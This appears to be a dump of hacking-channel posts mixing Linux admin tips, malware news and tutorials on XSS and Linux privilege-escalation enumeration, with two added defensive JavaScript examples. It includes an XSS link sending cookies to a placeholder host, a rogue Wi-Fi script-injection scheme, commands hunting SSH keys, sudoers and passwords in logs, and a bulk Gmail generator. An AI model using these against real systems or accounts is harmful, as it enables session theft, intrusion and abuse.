▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑VPS & LEAK .ONION 7/24 & 24/24 ALIVE
https://www.torproject.org/
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑HOW TO INSTALL TOR IN KALI, 2 STEPS:
How to install Tor Browser in Kali Linux using apt
Open a terminal window
1) Run apt-get update
2) Run apt-get install tor torbrowser-launcher and select Y at the prompt
3) You'll now have a new Tor Browser application in the Applications menu under Usual Applications and Internet.
> This shortcut will only work if you're not running as the root user.
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Be wary of the BasedMiner mining Trojan, which brute-forces weak SQL passwords to break in and mine:
#News
> The mining Trojan gang mainly targets MS SQL services with weak-password brute-force attacks. After a successful brute force, it downloads the Gh0st remote control Trojan to control the system. It also uses multiple Windows vulnerabilities for privilege escalation to obtain the highest system privileges and implants a Monero coin mining Trojan, which has been mining and has made a profit of 8,000 yuan.
> Because its remote control module is named based.dll, Tencent Security Center named it BasedMiner. After a BasedMiner intrusion, the remote control Trojan is implanted in the enterprise server, which may lead to the leakage of the victim enterprise's confidential information.
> While mining, server resources are heavily consumed, which affects normal business operation. Tencent security experts recommend that companies check for and correct the use of weak passwords for server logins, fix security vulnerabilities on the server, and avoid intrusion by mining gangs.
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑How to synchronize local and remote directories in Linux using Lsyncd?
Installing Lsyncd
1️⃣ On Debian and its derivatives, such as Ubuntu and Linux Mint, run the following command to install Lsyncd:
> sudo apt-get install lsyncd
2️⃣ On RHEL and CentOS, you need to enable the EPEL repository first.
a) sudo yum install epel-release
b) Then install Lsyncd with the command:
> sudo yum install lsyncd
> Lsyncd configuration on Debian, Ubuntu and derivatives
> Lsyncd does not provide a default configuration file on DEB-based systems.
c) We need to create it manually. However, Lsyncd includes some sample configuration files that give a general idea of how to set up synchronization. The example configuration files are found under the directory "/usr/share/doc/lsyncd-*/examples".
> ls /usr/share/doc/lsyncd/examples/
d) Output example:
lbash.lua lgforce.lua lpostcmd.lua lrsyncssh.lua
lecho.lua limagemagic.lua lrsync.lua
e) As the output above shows, each config file has a .lua extension, because the Lsyncd configuration file is written in the Lua programming language. Let's take a look at a sample configuration file.
> cat /usr/share/doc/lsyncd/examples/lrsync.lua
f) The lrsync.lua configuration file looks like this:
----
-- User configuration file for lsyncd.
--
-- Simple example for default rsync.
--
settings = {
    statusFile = "/tmp/lsyncd.stat",
    statusInterval = 1,
}
sync {
    default.rsync,
    source = "src",
    target = "trg",
}
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑GENERATE UNLIMITED GMAILS :
1️⃣DOWNLOAD :
> https://pypi.org/search/?c=Environment+%3A%3A+Win32+%28MS+Windows%29 (WIN)
> https://pypi.org/project/PyAutoGUI/ (for linux)
1) $ sudo apt-get install python-virtualenv
2) $ virtualenv --no-site-packages ~/venv
3) $ source ~/venv/bin/activate
4) $ mkdir -p ~/PIL ~/temp/site-packages
5) $ export PYTHONPATH=~/temp/site-packages/
6) $ cd ~/PIL
7) $ wget http://effbot.org/downloads/Imaging-1.1.7.tar.gz
8) $ sudo apt-get build-dep python-imaging
# sets up zlib1g-dev, libfreetype6-dev, libjpeg62-dev, liblcms1-dev, ...
9) $ easy_install -v --install-dir ~/temp/site-packages --find-links ~/PIL \
--allow-hosts=None --always-unzip Imaging
2️⃣get firefox browser https://www.mozilla.org/sp/firefox/new/
3️⃣git clone https://github.com/unix121/gmail-generator.git
4️⃣cd gmail-generator
5️⃣python3 gmail_generator.py
(use tor server)
6️⃣checkout the video tutorial after this post
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑HOW TO CHECK IF YOUR WEBSITE IS HACKED, FOR BEGINNERS:
1. A hacked website shows a characteristic pattern in its data: the number of indexed pages and the traffic from search engines increase dramatically in a short period of time. Webmasters can therefore use the indexing tool of the Baidu webmaster platform to watch for abnormalities in the site's indexed page count; if there is a sudden increase, use the traffic and keyword tool to check whether the keywords bringing the traffic are related to the website and whether they involve gambling or pornography.
2. Query the site with the site: search syntax combined with some common pornographic and gaming keywords; this works better and can uncover illegal pages that do not belong to the site.
3. Because Baidu brings a huge amount of traffic, some hacks redirect only the traffic arriving from Baidu, which is hard for the webmaster to notice. So when checking whether your site is hacked, click through to the site's pages from the Baidu search results and see whether you are redirected to another site.
4. The search results show a warning that the site's content is risky.
*Afterwards, you can ask the website's technical staff to confirm further, from backend data and programs, whether the website has been hacked.
WRITTEN BY UNDERCODE
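Added example (not part of the original post): check 3 above automated in JavaScript, requesting a page once directly and once with a search-engine Referer and comparing where each response redirects. The URLs, the Referer value, the sample responses and all function names are constructed for illustration.

```javascript
// Added example, not from the original post. URLs and names are constructed.

// Referer a visitor would send when clicking a search result (constructed value).
const SEARCH_REFERER = 'https://www.baidu.com/s?wd=example';

// True when two hosts belong to the same site, allowing www/sub-domain redirects.
function sameSite(a, b) {
  return a === b || a.endsWith('.' + b) || b.endsWith('.' + a);
}

// Host a response redirects to, or null when it is not an HTTP redirect.
function redirectHost(resp, pageUrl) {
  if (resp.status < 300 || resp.status >= 400 || !resp.location) return null;
  return new URL(resp.location, pageUrl).host; // also resolves relative Location values
}

// Compare the direct response with the one obtained via a search-engine Referer.
function compareResponses(pageUrl, direct, viaSearch) {
  const own = new URL(pageUrl).host;
  const directHost = redirectHost(direct, pageUrl);
  const searchHost = redirectHost(viaSearch, pageUrl);
  const offSite = (host) => host !== null && !sameSite(host, own);

  const target = offSite(searchHost) ? searchHost
    : offSite(directHost) ? directHost
    : null;
  if (target === null) {
    return { verdict: 'no-off-site-redirect', target: null };
  }
  if (target === searchHost && !offSite(directHost)) {
    // The pattern from check 3: only search-engine visitors are sent elsewhere.
    return { verdict: 'redirects-search-visitors-only', target };
  }
  return { verdict: 'off-site-redirect-not-referer-specific', target };
}

// Live probe: two GETs without following redirects (needs Node 18+ global fetch).
async function probe(pageUrl, fetchImpl = fetch) {
  const get = async (headers) => {
    const r = await fetchImpl(pageUrl, { redirect: 'manual', headers });
    return { status: r.status, location: r.headers.get('location') };
  };
  const direct = await get({});
  const viaSearch = await get({ Referer: SEARCH_REFERER });
  return compareResponses(pageUrl, direct, viaSearch);
}

// Constructed responses so the comparison can be run offline.
const PAGE = 'http://shop.example/item/1';
const SAMPLES = {
  cloaked: {
    direct: { status: 200, location: null },
    viaSearch: { status: 302, location: 'http://casino.example.net/landing' },
  },
  canonical: {
    direct: { status: 301, location: 'https://www.shop.example/item/1' },
    viaSearch: { status: 301, location: 'https://www.shop.example/item/1' },
  },
  relative: {
    direct: { status: 200, location: null },
    viaSearch: { status: 302, location: '/login' },
  },
};

// Verdict for each constructed sample.
function demoCloaking() {
  const out = {};
  for (const [name, s] of Object.entries(SAMPLES)) {
    out[name] = compareResponses(PAGE, s.direct, s.viaSearch).verdict;
  }
  return out;
}

console.log(demoCloaking());
```

This only sees HTTP-level redirects; a hacked page that checks the referrer in client-side script still needs the manual click-through from the search results.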
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑After confirming that the website is hacked, besides prompting technical staff to fix it quickly, SEO staff also need to do some follow-up and preventive work.
1. Stop the website service immediately so that users are no longer affected and other sites are not affected (returning a 503 status code is recommended).
2. If multiple sites at the same hosting provider are hacked during the same period, contact the hosting provider and urge them to respond.
3. Clean up the hacked content you have found, make the hacked pages return 404 as dead links, and submit them through the dead link submission tool of the Baidu webmaster platform.
4. Work out the likely time of the hack, compare it with file modification times on the server, and deal with the files uploaded or modified by the hackers; check the server's user management settings for abnormal changes; change the server's user access passwords. Note: you can determine the likely time of the hack from the access log, but hackers may also have modified the server's access log.
5. Harden security: check the website for vulnerabilities and prevent it from being hacked again.
WRITTEN BY UNDERCODE
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑A ransomware program called RAA has recently appeared. It is written entirely in JavaScript and locks users' files with strong encryption.
HOW IT WORKS?
> Most malware on Windows is written in a compiled language such as C or C++ and is distributed as executable files such as .exe or .dll. Other malware is written as command-line scripts, such as Windows batch and PowerShell.
> Client-side malware is rarely written in web-related languages such as JavaScript, which is mainly interpreted by the browser. But the built-in Script Host of Windows can also execute .js files directly.
> Attackers have only recently started using this technique. Last month, Microsoft warned that .js attachments in malicious emails may carry viruses, and ESET's Security Research Institute also warned that certain .js attachments may spread the Locky virus. But in both cases the JavaScript files are used as malware downloaders: they download and install traditional malware written in other languages from other addresses. RAA is different: it is malware written entirely in JavaScript.
> Experts at the BleepingComputer.com technical support forum said that RAA relies on CryptoJS, a secure JavaScript library, to implement its encryption process. The implementation of encryption is very solid, using the AES-256 encryption algorithm.
> Once a file is encrypted, RAA appends .locked to the original file name. Its encryption targets include: .doc, .xls, .rtf, .pdf, .dbf, .jpg, .dwg, .cdr, .psd, .cd, .mdb, .png, .lcd, .zip, .rar and .csv.
> Lawrence Abrams, the founder of BleepingComputer.com, said in a blog post: "Under the current circumstances, there is no way to decrypt except payment."
> According to user reports, after infection with RAA, messages in Russian are randomly displayed, but even if it targets Russian computers, its proliferation is only a matter of time.
> It's not normal to include JavaScript attachments in emails, so users are advised to avoid opening such files, even if they are included in .zip compressed files. .js files are rarely used anywhere except in websites and browsers.
WRITTEN BY UNDERCODE
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Reflected XSS - ALL YOU NEED TO KNOW :
A reflected XSS attack relies on the site's server returning the submitted script in its response, which then executes on the client to launch a web attack.
Example:
1) Suppose that when Amazon searches for books and finds none, it displays the submitted name.
2) Search for content in the search box, fill in "<script>alert('handsome boy')</script>", and click search.
3) The page does not filter the returned data and displays it directly, so the alert box appears.
4) Then you can construct an address that obtains the user's cookies, and get others to click on it through a QQ group or spam:
> http://www.amazon.cn/search?name=<script>document.location='http://xxx/get?cookie='+document.cookie</script>
PS: Of course, this address is invalid; it's just an example.
🦑In conclusion:
If you only succeed in steps 1, 2, and 3, you have only affected yourself. If you succeed in step 4, it is a proper XSS attack.
Defensive measures:
1) When the front end displays server data, not only tag content needs to be filtered and escaped; attribute values may need it too.
2) When the backend receives a request, it checks whether the request is an attack request and blocks it if so.
E.g.:
Tag:
<span><script>alert('handsome boy')</script></span>
Escaped:
<span>&lt;script&gt;alert('handsome boy')&lt;/script&gt;</span>
> Attributes:
3) If the value attribute of an input is
> onclick="javascript:alert('handsome boy')
the result may be
<input type="text" value="..." onclick="javascript:alert('handsome boy')">
4) Clicking on the input causes the attack script to be executed. The solution can be to filter the script or the double quotes.
WRITTEN BY UNDERCODE
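Added example (not part of the original post): defensive measure 1 above in JavaScript, rendering the hypothetical "no books found" page with and without output encoding for both the tag and the attribute case. The function names, the page template and the leading double quote in ATTR_PAYLOAD are assumptions made for illustration.

```javascript
// Added example, not from the original post. All names are illustrative.

// Payloads constructed from the post's two cases (tag content, attribute value).
const TAG_PAYLOAD = "<script>alert('handsome boy')</script>";
const ATTR_PAYLOAD = "\" onclick=\"javascript:alert('handsome boy')";

// Characters that can end a text node or a quoted attribute value.
const HTML_ENTITIES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Encode untrusted data for an HTML text node or a quoted attribute value.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Vulnerable: the search term is reflected into the markup unchanged.
function renderNotFoundUnsafe(name) {
  return `<span>No books found for ${name}</span>` +
         `<input type="text" value="${name}">`;
}

// Hardened: the same template with every interpolation encoded.
function renderNotFoundSafe(name) {
  const safe = escapeHtml(name);
  return `<span>No books found for ${safe}</span>` +
         `<input type="text" value="${safe}">`;
}

// Attribute names the <input> tag ends up with. Helper for this demo only:
// it assumes double-quoted attributes and is not a general HTML parser.
function inputAttributeNames(html) {
  const tag = html.match(/<input\b[^>]*>/);
  if (!tag) return [];
  return [...tag[0].matchAll(/([a-zA-Z-]+)\s*=\s*"[^"]*"/g)].map((m) => m[1]);
}

// What each payload turns into under both renderers.
function demoEncoding() {
  return {
    unsafeHasScriptTag: renderNotFoundUnsafe(TAG_PAYLOAD).includes('<script>'),
    safeHasScriptTag: renderNotFoundSafe(TAG_PAYLOAD).includes('<script'),
    unsafeAttrs: inputAttributeNames(renderNotFoundUnsafe(ATTR_PAYLOAD)),
    safeAttrs: inputAttributeNames(renderNotFoundSafe(ATTR_PAYLOAD)),
  };
}

console.log(demoEncoding());
```

In the unsafe rendering the attribute payload closes value="" and adds an onclick attribute; once encoded, the same bytes stay inside the value.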
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑DOM-based or local XSS - tutorial
DOM-based (local) XSS attacks: typically, free Wi-Fi is offered, but the gateway providing it inserts a script into any page you visit or directly returns a phishing page, thereby implanting malicious scripts. An attack like this, where the script ends up in the page directly without being returned by the site's server, is a local XSS attack.
Example 1:
1. Provide a free wifi.
1. Start a special DNS service, resolve all domain names to our computer, and set the Wifi DHCP-DNS to our computer IP.
2. After the user connected to wifi opens any website, the request will be intercepted by us. We forward to the real server according to the host field in the http header.
3. After receiving the data returned by the server, we can inject the web script and return it to the user.
4. When the injected script is executed, the user's browser will preload the common script libraries of major websites in turn.
WRITTEN BY UNDERCODE
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑User & privilege information (Linux):
Command    Result
whoami    Current username
id    Current user information
cat /etc/sudoers    Who's allowed to do what as root – privileged command
sudo -l    Can the current user perform anything as root
sudo -l 2>/dev/null | grep -Ew 'nmap|perl|awk|find|bash|sh|man|more|less|vi|vim|nc|netcat|python|ruby|lua|irb' | xargs -r ls -la 2>/dev/null
    Can the current user run any 'interesting' binaries as root and, if so, also display the binary permissions etc.
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Interesting Linux files:
Command    Result
find / -perm -4000 -type f 2>/dev/null    Find SUID files
find / -uid 0 -perm -4000 -type f 2>/dev/null    Find SUID files owned by root
find / -perm -2000 -type f 2>/dev/null    Find SGID (setgid) files
find / -perm -2 -type f 2>/dev/null    Find world-writeable files
find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null
    Find world-writeable files excluding those in /proc
find / -perm -2 -type d 2>/dev/null    Find world-writeable directories
find /home -name .rhosts -print 2>/dev/null    Find rhost config files
find /home -iname .plan -exec ls -la {} \; -exec cat {} 2>/dev/null \;
    Find .plan files, list permissions and cat the file contents
find /etc -iname hosts.equiv -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \;
    Find hosts.equiv, list permissions and cat the file contents
ls -ahlR /root/    See if you can access other user directories to find interesting files
cat ~/.bash_history    Show the current user's command history
ls -la ~/.*history    Show the current user's various history files
ls -la /root/.*history    Can we read root's history files
ls -la ~/.ssh/    Check for interesting ssh files in the current user's directory
find / -name "id_dsa*" -o -name "id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" 2>/dev/null | xargs -r ls -la
    Find SSH keys/host information
ls -la /usr/sbin/in.*    Check configuration of inetd services
grep -l -i pass /var/log/*.log 2>/dev/null    Check log files for keywords ('pass' in this example) and show positive matches
find /var/log -type f -exec ls -la {} \; 2>/dev/null    List files in specified directory (/var/log)
find /var/log -name "*.log" -type f -exec ls -la {} \; 2>/dev/null
    List .log files in specified directory (/var/log)
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Linux commands for service information:
Command    Result
ps aux | grep root    View services running as root
ps aux | awk '{print $11}' | xargs -r ls -la 2>/dev/null | awk '!x[$0]++'
    Look up process binary paths and permissions
cat /etc/inetd.conf    List services managed by inetd
cat /etc/xinetd.conf    As above for xinetd
cat /etc/xinetd.conf 2>/dev/null | awk '{print $7}' | xargs -r ls -la 2>/dev/null
    A very 'rough' command to extract associated binaries from xinetd.conf and show permissions of each
ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null
    Permissions and contents of /etc/exports (NFS)
🦑Jobs/Tasks:
Command    Result
crontab -l -u %username%    Display scheduled jobs for the specified user – privileged command
ls -la /etc/cron*    Scheduled jobs overview (hourly, daily, monthly etc.)
ls -aRl /etc/cron* | awk '$1 ~ /w.$/' 2>/dev/null
    What can 'others' write in /etc/cron* directories
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑How to manage FTP on Kali Linux?
1️⃣apt-get update && apt-get install pure-ftpd
2️⃣Create a script that starts with #!/bin/bash and contains the following commands
3️⃣groupadd ftpgroup
4️⃣useradd -g ftpgroup -d /dev/null -s /etc ftpuser
5️⃣pure-pw useradd offsec -u ftpuser -d /ftphome
6️⃣pure-pw mkdb
7️⃣cd /etc/pure-ftpd/auth/
8️⃣ln -s ../conf/PureDB 60pdb
9️⃣mkdir -p /ftphome
🔟chown -R ftpuser:ftpgroup /ftphome/
1️⃣1️⃣/etc/init.d/pure-ftpd restart